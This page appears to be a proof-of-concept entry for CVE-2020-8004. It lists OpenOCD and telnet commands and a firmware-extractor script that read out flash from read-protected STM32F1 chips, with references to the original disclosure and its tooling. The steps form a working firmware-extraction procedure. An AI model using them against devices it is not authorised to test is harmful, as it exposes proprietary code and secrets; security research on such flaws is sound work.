CVE-2020-8004 icon indicating copy to clipboard operation
CVE-2020-8004 copied to clipboard

CVE-2020-8004

测试

$cd openocd-toolbox/scripts/linux/stm32f1x/
$./lock.sh
$./attach.sh
($telnet localhost 4444)
($reset halt)
($mdw 0x08000000)
$cd stm32f1-firmware-extractor
$python3 main.py 0x08000000 512

test screenshot

参考

  • https://blog.zapb.de/stm32f1-exceptional-failure/
  • https://gitlab.zapb.de/zapb/stm32f1-firmware-extractor/
  • https://www.muselab-tech.com/cve-2020-8004-lou-dong-yuan-li-fen-xi/
  • 《Cortex-M3权威指南》